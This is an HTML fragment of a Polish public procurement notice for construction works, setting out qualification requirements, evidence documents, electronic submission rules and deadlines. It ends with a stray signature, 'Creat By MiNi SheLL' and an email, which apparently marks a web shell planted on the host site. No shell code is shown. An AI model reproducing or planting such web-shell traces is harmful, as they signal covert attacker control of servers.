bez ograniczeń posiadającą uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U z 2019 r., poz. 1186 z późn. zm.) oraz w Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 11 września 2019r. w sprawie przygotowania zawodowego do wykonania samodzielnych funkcji technicznych w budownictwie, lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U z 2020 r., poz. 220).<br/><br/>1 osobą, która będzie uczestniczyć w wykonaniu zamówienia w charakterze kierownika budowy/robót, w specjalności instalacyjnej (branży elektrycznej) bez ograniczeń posiadającą uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U z 2019 r., poz. 1186 z późn. zm.) oraz w Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 11 września 2019r. w sprawie przygotowania zawodowego do wykonania samodzielnych funkcji technicznych w budownictwie, lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U z 2020 r., poz. 220). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat licząc wstecz od dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (określonych w Rozdziale VI pkt 1.4.1.a SWZ), oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>2.	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich uprawnień, (określonych w Rozdziale VI pkt. 1.4.1.bSWZ), a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1 Oferta musi spełniać następujące wymogi:1) musi być sporządzona w języku polskim w postaci elektronicznej w formacie danych zgodnym z formatami wyszczególnionymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie – zaleca się sporządzenie oferty w formatach .doc, .docx, .pdf . Ofertę należy złożyć, pod rygorem nieważności w formie elektronicznej, tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę/y uprawnioną/e. Przez osobę/y uprawnioną/e należy rozumieć odpowiednio:<br/>a) osobę/y, która/e zgodnie z odpowiednimi<br/>przepisami jest/są uprawniona/e do składania oświadczeń woli w zakresie praw i obowiązków majątkowych wykonawcy;pełnomocnika/ów wykonawcy, którym pełnomocnictwa udzieliła/y osoba/y o której/ych mowa w lit. a);b) pełnomocnika ustanowionego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2) dokumenty i/lub oświadczenia<br/>sporządzone w języku obcym muszą być złożone wraz z ich tłumaczeniem na język polski.2. Wykonawca może zmienić formę graficzną wzorów załączników do SWZ oraz innych formularzy<br/>Zamawiającego jednakże treść zawarta we wzorach Zamawiającego nie może ulec zmianie.<br/>3. Musi zawierać (dokument/y potwierdzający/e umocowanie do reprezentowania Wykonawcy i/lub podmiotu udostepniającego zasoby ) w celu potwierdzenia, że osoba działająca w imieniu wykonawcy i/lub podmiotu udostepniającego zasoby jest umocowana do jego reprezentowania:<br/> a) odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do<br/>złożenia w/w dokumentów jeżeli zamawiający może je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca i/lub podmiot udostepniający zasoby wskazał dane<br/>umożliwiające dostęp do tych dokumentów (w druku oferta<br/>i/lub druku zobowiązania podmiotu udostępniającego zasoby) oraz z zastrzeżeniem ppkt. b) Jeżeli w imieniu wykonawcy i/lub podmiotu udostepniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w ppkt. a),<br/>zamawiający żąda od wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy i/lub podmiotu udostepniającego zasoby. W przypadku wykonawców zagranicznych należy dołączyć do OFERTY tłumaczenie niniejszych<br/>dokumentów na język polski <br/>4)	pełnomocnictwo – jeśli wymagane do reprezentowania Wykonawcy/ów <br/>5) Zobowiązanie podmiotu udostepniającego zasoby lub inny dokument wraz z oświadczeniem podmiotu o niepodleganiu wykluczenia i spełnienia warunków udziału ( jeśli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1 W przypadku składania oferty wspólnej przez kilku wykonawców, każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia musi złożyć dokumenty i oświadczenia wskazane w rozdziale, VI.2.1 <br/>Pozostałe dokumenty będą traktowane jako wspólne.<br/>2. Sposób spełnienia warunków udziału w postepowaniu przez wykonawców wspólnie ubiegających się, zgodnie z art. 58 ust. 4 Pzp został wskazany w Rozdziale VI pkt 1.4.1. a). <br/>3	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do OFERTY należy dołączyć stosowne pełnomocnictwo w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę lub osoby upoważnione do składania oświadczeń woli każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego.<br/>5	Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem. <br/>6 W formularzu OFERTA w miejscu „nazwa i adres wykonawcy” należy<br/> wpisać dane dotyczące wszystkich podmiotów wspólnie ubiegających<br/> się o udzielenie zamówienie, a nie tylko pełnomocnika.<br/>7 W formularzu OFERTA należy wskazać, które roboty budowlane wykonają poszczególni wykonawcy wspólnie ubiegający się o udzielenie zamówienia.<br/>8 Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań.<br/>9	Przed podpisaniem umowy od Wykonawców ubiegających się wspólnie o zamówienie publiczne, których oferta została wybrana Zamawiający będzie żądać umowy regulującej ich współpracę <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Możliwość zmiany zawartej umowy oraz warunki tych zmian zostały określone w projektowanych postanowieniach umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-22 08:50</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">z zachowaniem formy elektronicznej, przy użyciu systemu Platformy Zamówień Publicznych ZETOPZP: https://pzp.hyzne.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-22 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wyklucza wykonawcę na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego w przypadku wystąpienia którejkolwiek z określonych w niej przesłanek. W celu potwierdzenia braku podstaw do wykluczenia na podstawie w/w przesłanki Zamawiający wymaga złożenia określenia o niepodleganiu wykluczeniu potwierdzające brak podstaw wykluczenia na dzień składania ofert w zakresie art 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wsparciu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego - zawarte e druku OFERTA. W przypadku składania oferty wspólnej przez kilku wykonawców, każdy z wykonawców wspólnie ubiegający się o udzielenie zamówienia składa powyższe oświadczenie

Creat By MiNi SheLL
Email: jattceo@gmail.com